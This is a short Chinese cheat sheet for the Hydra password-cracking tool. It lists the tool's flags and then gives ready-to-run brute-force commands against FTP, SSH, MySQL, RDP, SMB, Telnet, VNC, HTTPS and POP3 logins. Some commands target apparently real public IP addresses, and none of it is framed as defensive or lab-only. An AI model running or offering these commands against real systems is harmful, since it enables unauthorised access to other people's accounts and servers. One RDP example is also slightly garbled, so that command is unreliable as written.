hydra的基本使用

-R：继续从上一次进度接着破解

-S：大写，采用 SSL 链接 https爆破

-s：小写，可通过这个参数指定非默认端口

-l：指定破解的用户，对特定用户破解

-L：指定用户名字典

-p：小写，指定密码破解，少用，一般是采用密码字典

-P：大写，指定密码字典

-e：可选选项，n：空密码试探，s：使用指定用户和密码试探

-C：使用冒号分割格式，例如「登录名:密码」来代替 -L/-P 参数

-M：指定目标列表文件一行一条

-o：指定结果输出文件

-f：在使用 -M 参数以后，找到第一对登录名或者密码的时候中止破解

-t：同时运行的线程数，默认为 16

-w：设置最大超时的时间，单位秒，默认是 30s

-v / -V：显示详细过程

-f：一但爆破成功一个就停止爆破server：目标 IP

service：指定服务名/协议

option：可选项

破解FTP hydra -L 用户字典 -P 密码字典 -vV 192.168.10.1 ftp

破解SSH hydra -l root -P 密码字典 -vV 1.15.136.212 ssh

爆破MySQL hydra -l root -P 密码字典 -vV 1.15.136.212 mysql

破解rdp hydra ip -l administrator -P 密码字典 -vV 1.15.136.212 rdp

破解smb

hydra -l administrator -P 密码字典 ip smb

破解telnet hydra ip telnet -l username -P 密码字典 -t 32 -s 23 -e ns -f -V

爆破vnc hydra -p Root123! -vV vnc://123.59.xxx.xxx:5901

破解HTTPS hydra -m /index.php -l username -P pass.txt IP https

破解POP3 hydra -l muts -P pass.txt my.pop3.mail pop3